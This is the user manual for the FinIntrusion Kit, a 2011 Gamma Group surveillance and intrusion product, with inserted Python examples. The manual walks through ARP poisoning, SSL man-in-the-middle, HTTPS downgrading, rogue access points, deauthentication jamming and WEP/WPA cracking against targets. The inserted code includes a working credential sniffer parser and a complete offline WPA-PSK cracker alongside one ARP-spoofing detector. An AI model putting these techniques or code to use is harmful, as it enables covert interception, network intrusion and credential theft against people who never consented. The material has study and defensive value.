FinIntrusion Kit / User Manual
Copyright 2011 by Gamma Group International, UK
Date 2011-09-23
Release information
Version  Date        Author  Remarks
1.0      2011-05-26  PK      Initial version
1.1      2011-08-12  PK      Review for release 2.1
1.2      2011-09-23  PK      Review for release 2.2
Table of Content
1 Overview
2 FinIntrusion Kit – Toolset
3 Equipment
3.1 Notebook
3.2 USB Hard-Disk
3.3 Wireless Equipment
4 Operating System
4.1 Introduction
4.2 Notebook Usage
5 Installation
5.1 Prerequisites
5.2 License
5.3 Update Software
6 Configuration
6.1 Network Configuration
6.1 Wireless Configuration
6.2 Language Options
7 FinIntrusion Kit – Network Intrusion
7.1 Target Identification
Jam Target
7.2 Monitor Target
7.2.1 PCAP Recorder
7.2.2 Open URL in Browser
8 FinIntrusion Kit – Wireless Intrusion
8.1 Wireless Network Identification
8.2 Identify hidden ESSID
8.3 Jam Wireless Network
8.4 Break Encryption
8.4.1 WEP Cracking
8.4.2 WPA/WPA2-PSK
8.5 Wireless Client Identification
8.6 Fake / Rogue Access Point
8.6.1 Adapter Selection
8.6.2 Reply-to and broadcast all seen ESSIDs
8.6.3 Emulate access-point only for ESSID
8.6.4 "Monitor all" Button
9 Password Generator Utils
9.1 Limitations
10 FinIntrusion Kit – Other Options
10.1.1 Delete / Delete all
10.1.2 Data Export
11 Activity Log
12 Support
1 OVERVIEW
The FinIntrusion Kit is a multi-purpose IT Intrusion kit that has been built specifically for today's operations by Law Enforcement and Intelligence Agencies. It can be utilized in a wide range of operational scenarios such as:
Breaking into and monitoring wireless and wired networks
Remotely breaking into e-mail accounts
Performing security assessments of servers and networks
The full capabilities are shown in several training courses, each focusing on different operational use-cases.
The following topics are covered within this document:
Equipment
Installation
Configuration
Usage
Support
[Figure: FinFisher product portfolio: FinSpy, FinSpy Mobile, FinFly, FinUSB Suite, FinIntrusion Kit, FinFireWire, FinTraining, FinAdvisory]
2 FININTRUSION KIT – TOOLSET
All the tools within the BackTrack system require advanced knowledge of the basic techniques related to their purpose. Most tools have to be used on the command line as they do not provide any graphical user interface.
The FinIntrusion Kit toolset is categorized into the following sub-categories:
Network: Tools for Local Area Network (LAN) Intrusion
- Network Scanner discovers all systems which are part of the same Local Area Network.
- Network Scanner tries to identify the Operating System and hostname of a target PC.
- Network Jammer prevents Internet access for selected systems.
- Network Sniffer redirects traffic in the Local Area Network and logs credentials from a target PC.
- MAC Change function to spoof the hardware address of a local network adapter.
Wireless: Tools for Wireless Network and Client Intrusion
- Wireless Scanner discovers Access Points and connected wireless clients of all wireless networks that can be reached with the adapter (and antenna).
- Wireless Scanner discovers wireless clients which search for a known wireless network, and emulates a "Fake" Access Point for these systems.
- Hidden ESSID Identifier starts attacks against a specific wireless network to extract its "hidden ESSID".
- Wireless Jammer can be started against selected wireless clients or an Access Point to re-route target systems over a "Fake" Access Point.
- WEP Cracking against 40/64-bit or 104/128-bit protected wireless networks.
- WPA Cracking against WPA-PSK or WPA2-PSK protected wireless networks.
Password: Password Generation Utilities
- Password Generator from a specific website. This generator extracts words from a specified website and generates a unique password list.
Reporting:
- Export function to save all results to "*.csv" files.
- Generate an Activity Log with all status and result messages.
3 EQUIPMENT
The kit includes a range of equipment for various local and remote IT Intrusion scenarios. Some usage examples are supplied within the following chapters.
[Figure: Overview of Equipment]
3.1 Notebook
The notebook is the core of the kit. It is loaded with the BackTrack operating system and the FinIntrusion Kit software.
3.2 USB Hard-Disk
The external USB Hard-Disk contains various data to help with certain attacks, for example:
Rainbow Tables for LM / WPA / MD5
Default Password List
Wordlists for various languages and subjects
It can also be utilized as a storage device for gathered information.
3.3 Wireless Equipment
The included Wireless (802.11) and Bluetooth equipment can be used for short- and long-distance attacks against wireless networks/clients and Bluetooth-enabled devices.
Wireless examples:
Scanning for Wireless Networks and Clients
Breaking WEP/WPA/WPA2 Encryption
Emulating an Access-Point for Client-Side attacks
Monitoring Wireless LAN Traffic
Bluetooth examples:
Scanning for Bluetooth Devices
Executing known attacks like Bluesnarf, Bluebug and more
4 OPERATING SYSTEM
4.1 Introduction
The FinIntrusion Kit is shipped with a copy of BackTrack 5, an operating system based on Linux that includes a complete set of up-to-date IT intrusion and analysis tools.
The BackTrack operating system is used by numerous professional IT security companies world-wide.
4.2 Notebook Usage
Turn on the notebook and boot with the default settings. After the BackTrack graphical user interface (GDM) has loaded, it is ready to use.
The system can be customized using the programs included in the menu.
5 INSTALLATION
5.1 Prerequisites
BackTrack 5 R1, 32-bit operating system
Gnome desktop version
The following packages have to be installed before you can use FinIntrusion Kit:
mono-runtime
gtk-sharp2
dhcp3-server
whois
To install the software on the FinIntrusion Kit follow these steps:
1. Insert CD-Rom and open the folder FinIntrusion Kit
2. Click on the file “finintrusionkit_installer_v_XXX.ggi”
3. A shortcut for launching FinIntrusion Kit now appears on the desktop (/root/Desktop/FinIntrusionKit.desktop)
5.2 License
Place the license ".ggpck" file on a USB stick or CD-ROM:
1. Mount the USB stick or CD/DVD
CD-ROM:
# sudo mount /media/cdrom0
USB stick (the device name may differ on your system; check dmesg after plugging it in):
# sudo mount /dev/sdb1 /mnt/
2. Copy the license file to /tmp
CD-ROM:
# cp /media/cdrom0/CERTS-FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/
USB stick:
# cp /mnt/CERTS-FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/
3. Start FinIntrusion Kit and press the "import License" button.
4. Choose your *.ggpck file and press the "import" button.
5. After import the license will be checked.
6. If the license is valid, close the dialog.
7. Restart the FinIntrusion Kit Application.
5.3 Update Software
The FinIntrusion Kit software is updated regularly to keep up with the ever-changing IT environment.
FinIntrusion Kit is equipped with the option of downloading such software updates. It can be configured to check for updates automatically at certain intervals, or the user can check for an update straight away.
Update checks can be configured to run every time the application starts or at various intervals.
If an update is found, the following dialogue is shown, including the automatic installation of the updated software.
After the installation of an update the user can verify that the new version has been installed by checking the version number in the About box.
6 CONFIGURATION
6.1 Network Configuration
The user can select the proper network adapter by choosing it from the "Interface:" combo box.
For Network Intrusion it is necessary that the FinIntrusion Kit is running in the same network as the target system.
If the network adapter has no IP address, press the DHCP button to obtain a new IP address via DHCP.
In order to proceed with the Network Intrusion, click the corresponding tab button.
6.1 Wireless Configuration
The user can select the proper wireless adapter by choosing it from the "Interface:" combo box. To attack a target system which is connected through a wireless network it is necessary to be in the same wireless network.
To configure a wireless adapter for a specific wireless network we recommend using the "Wicd Network Manager".
Start "Wicd", change the Preferences and add the wireless interface, e.g. "wlan0".
Press the "Refresh" button and select a wireless network (SSID broadcasting must be enabled on that network!). Press the "Connect" button to configure all necessary parameters for the selected wireless network.
6.2 Language Options
The application is translated into a number of languages and the user has the option of choosing one.
Click on "Language" in the main menu on the left side.
After choosing a different language the application has to be restarted for the change to take effect.
7 FININTRUSION KIT – NETWORK INTRUSION
7.1 Target Identification
To monitor or jam a target system it is necessary to detect the system inside the (W)LAN. This feature is provided by the "Network Scanner" and is started with the scan button.
All systems inside the network are listed. By default a class C network (/24, e.g. 10.0.0.0/24 or 10.0.0.1 – 10.0.0.254) is scanned. The target must be in the same network as the FinIntrusion Kit.
Work flow:
1. An ARP scan captures the MAC addresses of all connected targets.
2. The Operating System is identified with OS fingerprinting techniques.
3. The hostname is identified.
Note: The OS scan can trigger an AV detection / warning and does not work against all target systems.
Jam Target
The "Network Jammer" blocks a target from having Internet access.
The "Network Jammer" initiates an "ARP Cache Poisoning" attack against the target PC and overwrites the MAC address of the default gateway in the target's ARP cache with an invalid value, so the target can no longer reach the gateway.
The "Network Jammer" runs in the background for as long as the FinIntrusion Kit is running, or until the stop button is pressed.
[Figure: ARP cache on the target PC before and after "ARP Cache Poisoning" was started]
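The following is an added example and not code from the FinIntrusion Kit or this manual. It shows the ARP-cache-poisoning effect described above from the target's side and the check a defender would run against it: a simulated ARP cache is replayed with a constructed sequence of ARP replies (all IP and MAC addresses are made up), and a monitor flags the moment the gateway's IP is claimed by a different or unusable hardware address. A real monitor would read the replies from the wire instead of from the constructed list.

```python
"""Spot the ARP-cache-poisoning pattern used by the "Network Jammer".

Added example, not code from the FinIntrusion Kit or its manual. ARP replies
and addresses below are constructed for illustration.
"""
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "ts sender_ip sender_mac")

GATEWAY_IP = "10.0.0.1"                    # made up
REAL_GATEWAY_MAC = "00:11:22:33:44:55"     # made up

# Constructed sample of ARP replies as seen by the target PC.
SAMPLE_REPLIES = [
    ArpReply(0.0, "10.0.0.1", REAL_GATEWAY_MAC),      # genuine gateway
    ArpReply(1.0, "10.0.0.42", "00:aa:bb:cc:dd:ee"),  # unrelated host
    ArpReply(2.0, "10.0.0.1", REAL_GATEWAY_MAC),      # genuine gateway again
    ArpReply(3.0, "10.0.0.1", "de:ad:be:ef:00:01"),   # poisoned: different MAC
    ArpReply(3.5, "10.0.0.1", "00:00:00:00:00:00"),   # poisoned: invalid value
]


def is_invalid_unicast_mac(mac):
    """All-zero, broadcast, or group-bit addresses can never be a real gateway NIC."""
    octets = [int(o, 16) for o in mac.split(":")]
    return all(o == 0 for o in octets) or all(o == 0xFF for o in octets) or bool(octets[0] & 1)


def detect_arp_poisoning(replies, gateway_ip, pinned_mac=None):
    """Return alerts (ts, reason, mac) for replies that claim gateway_ip suspiciously.

    pinned_mac is the MAC the operator knows the gateway has. If None, the first
    MAC seen is trusted, which is weaker but all a cold-started monitor can do.
    """
    alerts = []
    trusted = pinned_mac.lower() if pinned_mac else None
    for r in replies:
        if r.sender_ip != gateway_ip:
            continue
        mac = r.sender_mac.lower()
        if is_invalid_unicast_mac(mac):
            alerts.append((r.ts, "invalid-mac", mac))
        elif trusted is None:
            trusted = mac
        elif mac != trusted:
            alerts.append((r.ts, "mac-changed", mac))
    return alerts


def simulate_target_cache(replies):
    """What a naive ARP cache does: every reply overwrites the entry for that IP."""
    cache = {}
    for r in replies:
        cache[r.sender_ip] = r.sender_mac.lower()
    return cache


if __name__ == "__main__":
    before = simulate_target_cache(SAMPLE_REPLIES[:3])
    after = simulate_target_cache(SAMPLE_REPLIES)
    print("gateway entry before:", before[GATEWAY_IP], "after:", after[GATEWAY_IP])
    for alert in detect_arp_poisoning(SAMPLE_REPLIES, GATEWAY_IP, REAL_GATEWAY_MAC):
        print("ALERT", alert)
```

The cache replay ends with the gateway mapped to 00:00:00:00:00:00, which is the "after" state the manual's figure shows; the monitor raises one alert for the changed MAC and one for the invalid one. Pinning the gateway MAC (static ARP entry or a configured value) is what turns this from a heuristic into a reliable check.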
7.2 Monitor Target
The "Network Sniffer" can be used to extract all usernames and passwords of known protocols from the network traffic.
Select a target and start parsing its traffic; all account data found is printed.
FinIntrusion Kit includes three different Monitoring Modes. The default mode is "HTTPS Emulation".
"Non-SSL" Mode: captures credentials which were transmitted in CLEARTEXT. Protocols (examples): SMTP, POP3, IMAP, Telnet, SNMP, HTTP, FTP, ...
"HTTPS Emulation" (default mode): captures credentials which were transmitted in CLEARTEXT and additionally tries to redirect HTTPS to HTTP. Protocols (examples): SMTP, POP3, IMAP, Telnet, SNMP, HTTP & HTTPS (redirect), FTP, ...
"SSL" Mode: captures credentials which were transmitted in CLEARTEXT and credentials "encrypted" with SSL (SSL man-in-the-middle). Protocols (examples): SMTP & SMTPS, POP3 & POP3S, IMAP & IMAPS, Telnet, SNMP, HTTP & HTTPS, FTP, ...
Note: Enabling the "SSL Man-in-the-Middle" option (SSL Mode) causes all clients to see a warning that the SSL/TLS certificate of their server has changed. This affects all SSL sessions (web, e-mail, etc.). The warning also appears if the HTTPS-to-HTTP redirect does not work.
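The following is an added example and not the FinIntrusion Kit's own sniffer code. It shows the logic behind the "Non-SSL" mode above: FTP, POP3, HTTP Basic authentication and SMTP AUTH PLAIN carry the username and password verbatim (or merely Base64-encoded), so a parser over the client-to-server payload recovers them. The segments, hosts, names and passwords are all constructed; a TLS record is included to show that an encrypted session yields nothing, which is why the kit falls back to HTTPS-to-HTTP redirection or an SSL man-in-the-middle for those. The url field mirrors what the "Open URL in Browser" function needs.

```python
"""Extract cleartext credentials from captured application-layer payloads.

Added example, not code from the FinIntrusion Kit. Sample segments are constructed.
"""
import base64
import re
from collections import namedtuple

Segment = namedtuple("Segment", "src dst dport payload")

# Constructed client -> server segments; all addresses and credentials are made up.
SAMPLE_SEGMENTS = [
    Segment("10.0.0.23", "10.0.0.200", 21, b"USER alice\r\nPASS s3cret\r\n"),
    Segment("10.0.0.23", "10.0.0.201", 110, b"USER bob@example.test\r\nPASS hunter2\r\n"),
    Segment("10.0.0.23", "10.0.0.202", 80,
            b"GET /admin HTTP/1.1\r\nHost: intranet.example.test\r\n"
            b"Authorization: Basic " + base64.b64encode(b"carol:Passw0rd!") + b"\r\n\r\n"),
    Segment("10.0.0.23", "10.0.0.203", 25,
            b"AUTH PLAIN " + base64.b64encode(b"\x00dave\x00mailpass") + b"\r\n"),
    # TLS ClientHello fragment: nothing to parse without a man-in-the-middle
    Segment("10.0.0.23", "10.0.0.204", 443,
            b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 40),
]


def _user_pass(text):
    """FTP and POP3 both log in with USER <name> / PASS <password> lines."""
    user = re.search(r"^USER (\S+)", text, re.M)
    pw = re.search(r"^PASS (\S+)", text, re.M)
    return (user.group(1), pw.group(1)) if user and pw else None


def _http_basic(text):
    """HTTP Basic auth: Base64 of user:password plus the Host/path for the URL."""
    m = re.search(r"^Authorization: Basic ([A-Za-z0-9+/=]+)", text, re.M)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    except ValueError:
        return None
    user, _, pw = decoded.partition(":")
    host = re.search(r"^Host: (\S+)", text, re.M)
    path = re.search(r"^(?:GET|POST|PUT) (\S+)", text, re.M)
    return user, pw, host.group(1) if host else None, path.group(1) if path else "/"


def _smtp_auth_plain(text):
    """SMTP AUTH PLAIN: Base64 of \\0user\\0password."""
    m = re.search(r"^AUTH PLAIN ([A-Za-z0-9+/=]+)", text, re.M)
    if not m:
        return None
    try:
        parts = base64.b64decode(m.group(1)).split(b"\x00")
    except ValueError:
        return None
    if len(parts) != 3:
        return None
    return parts[1].decode("utf-8", "replace"), parts[2].decode("utf-8", "replace")


def extract_credentials(segments):
    """Return dicts with protocol, server, username, password and a URL to verify with."""
    found = []
    for s in segments:
        try:
            text = s.payload.decode("ascii")
        except UnicodeDecodeError:
            continue  # binary payload (e.g. TLS records): no cleartext to parse
        if s.dport in (21, 110):
            cred = _user_pass(text)
            if cred:
                proto = "ftp" if s.dport == 21 else "pop3"
                url = f"ftp://{cred[0]}:{cred[1]}@{s.dst}/" if proto == "ftp" else None
                found.append({"protocol": proto, "server": s.dst,
                              "username": cred[0], "password": cred[1], "url": url})
        elif s.dport == 80:
            cred = _http_basic(text)
            if cred:
                host = cred[2] or s.dst
                found.append({"protocol": "http", "server": host, "username": cred[0],
                              "password": cred[1], "url": f"http://{host}{cred[3]}"})
        elif s.dport == 25:
            cred = _smtp_auth_plain(text)
            if cred:
                found.append({"protocol": "smtp", "server": s.dst,
                              "username": cred[0], "password": cred[1], "url": None})
    return found


if __name__ == "__main__":
    for c in extract_credentials(SAMPLE_SEGMENTS):
        print(c)
```

Four credentials come out of the five segments; the 443 segment contributes nothing, and the same is true for any client that has already moved to HTTPS, which is the practical limit of a passive sniffer.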
7.2.1 PCAP Recorder
This feature can be used to record all data from a selected target system into a PCAP file.
The file can be analyzed with various network analyzers (e.g. Wireshark) or kept as a piece of evidence.
FinIntrusion Kit supports two different types of PCAP Recorder:
"tcpdump": generates a network capture file (pcap) with tcpdump in the background, using a capture filter for the selected IP. No traffic analyzer is started. Output file: "/tmp/fik_pcap_recorder_IP-ADDRESS.pcap"
"Wireshark": starts Wireshark in the foreground with a capture filter for the selected target IP (the selected row). The capture file must be saved manually at the end of the session!
Note: The PCAP Recorder can be combined with all three Monitoring Modes.
7.2.2 Open URL in Browser
Select a logged FTP, HTTP or HTTPS credential and a special option is activated in the submenu ("Open URL in Browser"). This feature is useful to verify whether the credentials are correct.
Note: The URL / hostname may differ from the URL normally used for the authentication process (forwarding, load balancer, etc.). For FTP accounts the credentials (username and password) are used automatically.
8 FININTRUSION KIT – WIRELESS INTRUSION
For all wireless-based attacks, the Alfa USB adapter should be used, as its functionality and drivers provide the best support for the applied Wireless Intrusion techniques.
After the Alfa USB adapter is plugged into the notebook via the provided USB cable, it is recognized automatically. If the interface isn't listed, reconnect the adapter and press the refresh button.
8.1 Wireless Network Identification
All Wireless Network Intrusion functions are blocked until a wireless network has been found.
[Figure: "Wireless Network Intrusion" submenu]
Press the scan button to scan for wireless networks within range of the FinIntrusion Kit system and display them with detailed information.
The following information is displayed for discovered networks:
SSID        Name of the Access Point / wireless network
BSSID       MAC address of the Access Point
Channel     Frequency / channel in use
Encryption  Type of encryption: OPEN / WEP / WPA / WPA2
Key         Recovered key (filled in after a successful crack)
[Figure: Example of a "Wireless Network Scan"]
Select an Access Point and a list of "Connected Clients" for this AP is shown below it.
8.2 Identify hidden ESSID
FinIntrusion Kit includes a module to identify a hidden ESSID. For this module it is necessary to have at least one connected client on the selected Access Point.
An ESSID is necessary for WPA cracking (it is the salt of the pre-shared key derivation) and to set up a Fake AP for a specific ESSID.
[Figure: Before and after "Identify Hidden SSID" finished successfully]
8.3 Jam Wireless Network
To block all clients connected to a specific Access Point, or only one selected wireless client, use the "Wireless Jammer" module.
[Figure: Example of "Wireless Jammer" started]
The "Wireless Jammer" sends de-authentication packets to the wireless client(s).
Note: If a specific connected wireless client is selected before the WLAN Jammer is started, only this wireless client is blocked. If no "Connected Wireless Client" is selected, all wireless clients are blocked.
The packet counter for the Wireless Jammer (default value = 10 packets) can be modified in "/usr/local/finintrusionkit/conf/FinIntrusionKit.cfg":
<?xml version="1.0" encoding="utf-8"?>
<FinIntrusionKit>
  ... snip ...
  <WIRELESS>
    ... snip ...
    <Wireless_Deauth_Counter>10</Wireless_Deauth_Counter>
    ... snip ...
  </WIRELESS>
</FinIntrusionKit>
8.4 Break Encryption
FinIntrusion Kit includes a module to break WEP and WPA/WPA2 (PSK mode) encryption. For this module it is necessary to have at least one connected wireless client.
In case a wireless network is encrypted using WEP or WPA/WPA2, select the encrypted network and press the crack button.
The software will now try to automatically retrieve the WEP key or the WPA/WPA2 pre-shared key, which can then be used to join the network.
8.4.1 WEP Cracking
[Figure: Example of a successful "WEP Crack"]
This process should not take longer than 10 minutes. In case it cannot recover the key, try restarting the process. As this technique does not work on all types of wireless networks, it may have to be done manually.
Work flow:
1. Identify a WEP-encrypted wireless network with at least one connected wireless client.
2. The connected wireless client is disconnected with de-authentication packets.
3. The target system reconnects to the Access Point; the packets exchanged are captured in the background.
4. A replay attack is started and these fragments are replayed.
5. The Access Point / wireless clients are triggered to send more packets, so more encrypted data packets / IVs are captured.
6. Once enough IVs are collected, the WEP crack can succeed.
Depending on the size of the WEP key and whether ASCII or HEX values were used, a different number of packets must be captured.
Key Length           Encrypted data packets with distinct IVs
40 / 64-bit ASCII    ~ 30,000 packets
40 / 64-bit HEX      ~ 40,000 packets
104 / 128-bit ASCII  ~ 60,000 packets
104 / 128-bit HEX    ~ 70,000 packets
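The following is an added example and not code from the FinIntrusion Kit. The WEP workflow above only succeeds once enough encrypted data frames with different IVs have been collected, so the check a practitioner wants during step 5 is "how many distinct IVs do I hold for this BSSID, and how far is that from the table above?". The example parses the 802.11 data-frame header to locate the BSSID and the 3-byte WEP IV, counts distinct IVs per BSSID, and compares the count with the manual's thresholds. The frames are constructed with a helper (MAC addresses and IVs are made up); a real run would read them from a monitor-mode capture such as the PCAP Recorder output.

```python
"""Count distinct WEP IVs per BSSID from 802.11 data frames.

Added example, not code from the FinIntrusion Kit. Frames below are constructed.
"""
from collections import defaultdict

# Thresholds stated in the manual's table (approximate packet counts).
IVS_NEEDED = {
    (64, "ascii"): 30_000,
    (64, "hex"): 40_000,
    (128, "ascii"): 60_000,
    (128, "hex"): 70_000,
}

FC_TYPE_DATA = 0x08       # frame control byte 0: type = data (2), subtype 0
FLAG_TO_DS = 0x01         # frame control byte 1 flags
FLAG_FROM_DS = 0x02
FLAG_PROTECTED = 0x40


def build_data_frame(bssid, sta, iv, from_ds=True, protected=True):
    """Constructed 802.11 data frame: 24-byte header, then WEP IV + key index + payload."""
    flags = (FLAG_FROM_DS if from_ds else FLAG_TO_DS) | (FLAG_PROTECTED if protected else 0)
    if from_ds:   # AP -> station: addr1 = STA, addr2 = BSSID, addr3 = source
        addrs = sta + bssid + bssid
    else:         # station -> AP: addr1 = BSSID, addr2 = STA, addr3 = destination
        addrs = bssid + sta + bssid
    header = bytes([FC_TYPE_DATA, flags]) + b"\x00\x00" + addrs + b"\x00\x00"
    return header + iv + b"\x00" + b"\x11" * 8   # IV(3), key id(1), some ciphertext


def wep_iv(frame):
    """Return (bssid, iv) for a WEP-protected data frame, else None."""
    if len(frame) < 28 or (frame[0] & 0x0C) != 0x08:   # type bits must say 'data'
        return None
    flags = frame[1]
    if not flags & FLAG_PROTECTED:
        return None
    if flags & FLAG_FROM_DS:
        bssid = frame[10:16]      # addr2
    elif flags & FLAG_TO_DS:
        bssid = frame[4:10]       # addr1
    else:
        bssid = frame[16:22]      # addr3 (IBSS)
    hdr_len = 26 if frame[0] & 0x80 else 24   # QoS data subtypes carry 2 extra bytes
    return bssid, frame[hdr_len:hdr_len + 3]


def count_distinct_ivs(frames):
    """Map BSSID -> number of distinct IVs seen in protected data frames."""
    seen = defaultdict(set)
    for f in frames:
        r = wep_iv(f)
        if r:
            seen[r[0]].add(r[1])
    return {bssid: len(ivs) for bssid, ivs in seen.items()}


def crack_readiness(distinct_ivs, key_bits, key_style):
    """Fraction of the manual's threshold collected; >= 1.0 means 'try the crack'."""
    return distinct_ivs / IVS_NEEDED[(key_bits, key_style)]


# Constructed sample: one AP with three distinct IVs (one repeated), plus an
# unprotected data frame and a beacon (management frame), which must be ignored.
AP = bytes.fromhex("001122334455")    # made up
STA = bytes.fromhex("66778899aabb")   # made up
SAMPLE_FRAMES = [
    build_data_frame(AP, STA, b"\x01\x02\x03"),
    build_data_frame(AP, STA, b"\x01\x02\x04", from_ds=False),
    build_data_frame(AP, STA, b"\x01\x02\x03"),             # repeated IV, counted once
    build_data_frame(AP, STA, b"\xaa\xbb\xcc"),
    build_data_frame(AP, STA, b"\xde\xad\xbe", protected=False),
    bytes([0x80, 0x00]) + b"\x00" * 22 + b"\x01\x02\x03\x00",   # beacon
]

if __name__ == "__main__":
    for bssid, n in count_distinct_ivs(SAMPLE_FRAMES).items():
        print(bssid.hex(":"), n, "distinct IVs,",
              f"{crack_readiness(n, 64, 'ascii'):.2%} of the 40/64-bit ASCII threshold")
```

Only distinct IVs count; the repeated IV in the sample is counted once, and frames without the Protected flag or of management type are skipped, which is why the packet counter in a cracking tool climbs much more slowly than the raw frame count.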
8.4.2 WPA/WPA2-PSK
[Figure: Example of a successful crack]
To recover a "WPA/WPA2" PSK (pre-shared key) it is necessary to capture a 4-way handshake. This handshake only takes place when a wireless client connects to a wireless network. Once the client is associated, it does not send the handshake again (until the next disconnect). To trigger the handshake it is therefore necessary to perform an active attack and disconnect a wireless client with some de-authentication packets. The captured handshake is then attacked offline: each candidate passphrase from the wordlist is tested against it, and no further interaction with the network is needed.
Work flow:
1. Disconnect an established wireless client / Access Point connection (with de-authentication packets).
2. The wireless client tries to reconnect to the Access Point and performs the 4-way handshake.
3. FinIntrusion Kit starts a wordlist attack against the selected Access Point. On BackTrack a password list exists at the location "/pentest/passwords/wordlists/".
[Figure: WPA Cracking Option Dialog Box]
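The following is an added example and not the FinIntrusion Kit's own cracker. It shows why the workflow above needs exactly one captured handshake and nothing else: from ANonce, SNonce, the two MAC addresses and the MIC of EAPOL message 2, every candidate passphrase can be verified offline by running PBKDF2 and the IEEE 802.11i key hierarchy (PMK, PTK, KCK) and recomputing the MIC, using only the Python standard library. The handshake here is constructed from a known passphrase so that the result can be checked; the SSID, MAC addresses, nonces, passphrase and wordlist are all made up. In a real run these values come from the capture.

```python
"""Offline wordlist attack on a WPA/WPA2-PSK 4-way handshake (standard library only).

Added example, not code from the FinIntrusion Kit. The handshake is constructed
from a known passphrase for demonstration.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512 from 802.11i: HMAC-SHA1 blocks over the sorted MACs and nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]   # KCK = bytes 0..15, KEK = 16..31, TK follows


MIC_OFFSET = 81   # EAPOL header (4) + EAPOL-Key fields preceding the Key MIC field


def eapol_mic(kck, eapol_frame, wpa2=True):
    """Key MIC over the frame with the MIC field zeroed (HMAC-SHA1 for WPA2, HMAC-MD5 for WPA)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """Constructed EAPOL-Key message 2 (station -> AP) carrying SNonce and the MIC."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: pairwise, MIC set, HMAC-SHA1 version
            + b"\x00\x10"                    # key length
            + (1).to_bytes(8, "big")         # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key id
            + mic + b"\x00\x00")             # key MIC, key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def crack_psk(handshake, wordlist):
    """Return the passphrase whose MIC matches the captured message 2, or None."""
    captured_mic = handshake["eapol2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["aa"], handshake["spa"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol2"]), captured_mic):
            return candidate
    return None


def constructed_handshake(passphrase, ssid="CorpWiFi-Guest"):
    """Build a consistent 'capture' from a known passphrase (demo only; values made up)."""
    aa = bytes.fromhex("001122334455")      # AP MAC
    spa = bytes.fromhex("66778899aabb")     # station MAC
    anonce = bytes(range(32))               # fixed nonces in place of random ones
    snonce = bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol2 = build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce)))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol2": eapol2}


WORDLIST = ["password", "letmein", "CorpWiFi-Guest", "letmein2011", "Welcome1"]   # made up

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(constructed_handshake("letmein2011"), WORDLIST))
```

Each candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is why the attack is entirely bound by wordlist quality and CPU/GPU speed, and why the SSID matters (it is the PBKDF2 salt, so rainbow tables only help for common SSIDs). A passphrase absent from the wordlist is simply not recovered.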
8.5 Wireless Client Identification
All Wireless Client Intrusion functions are blocked until a wireless network has been found.
[Figure: "Wireless Client Intrusion" submenu]
Press the scan button to scan for wireless clients within range of the FinIntrusion Kit system and display them with detailed information.
The following information is displayed for discovered clients:
Client MAC    MAC address of the target client's wireless adapter
Vendor        Manufacturer, translated from the Organizationally Unique Identifier (OUI) part of the MAC address
BSSID         MAC address of the Access Point (only if associated!)
Probed ESSID  Names of previously used wireless networks the client is searching for
8.6 Fake / Rogue Access Point
For this attack, the software emulates a fake Access Point which wireless clients can find and connect to. This is a very useful attack to get access to the targets' network traffic and gain a position from which to attack their systems.
[Figure: Example of "Fake AP" started]
Two different modes exist:
- Reply to all Broadcasts
- Reply to specific ESSID
8.6.1 Adapter Selection
If a client connects and cannot access the Internet, no valuable traffic is created on its side and therefore no essential data can be gathered by monitoring it.
To redirect all traffic from the target wireless stations the FinIntrusion Kit system needs an Internet connection / uplink.
Using this technique, clients associate normally with the Access Point and use the Internet as they normally do with public hotspots.
Fake AP Adapter: can only be a wireless adapter. The "Fake Access Point" is started on this adapter.
Uplink Adapter: any adapter other than the "Fake AP Adapter" whose status is "UP". This interface is used to provide Internet access to all connected wireless clients. Typically a cable network interface should be used here.
8.6.2 Reply-to and broadcast all seen ESSIDs
In this mode, the software sees all probe requests for wireless LANs sent by nearby systems and replies to all of them, so the probing systems connect to the emulated Access Point. This is very effective because Windows systems in particular always scan for recently used wireless networks (e.g. hotel/hotspot networks).
The ESSID text field is deactivated. Gamma does not recommend this mode: if a target subject was previously connected to e.g. "My Home Network" / "Hotel XYZ" / "Airport XYZ" and is now connected to an Access Point with the same network name, this can be conspicuous (only if the person is NOT in that environment anymore!).
8.6.3 Emulate access-point only for ESSID
This feature emulates a normal Access Point which the target systems see when scanning for wireless networks. The chosen ESSID can trick people into selecting and associating with this network.
8.6.4 "Monitor all" Button
A passive network sniffer is started in the background. Features are:
- Captures all credentials from wireless clients connected to your Fake Access Point.
- Traffic from all wireless clients is captured; no single target selection is necessary.
- All cleartext passwords (FTP, IRC, SNMP, etc.) are captured, as in the Non-SSL Mode of the network section.
- An HTTPS-to-HTTP emulation is started automatically in the background, as far as the target web page supports it.
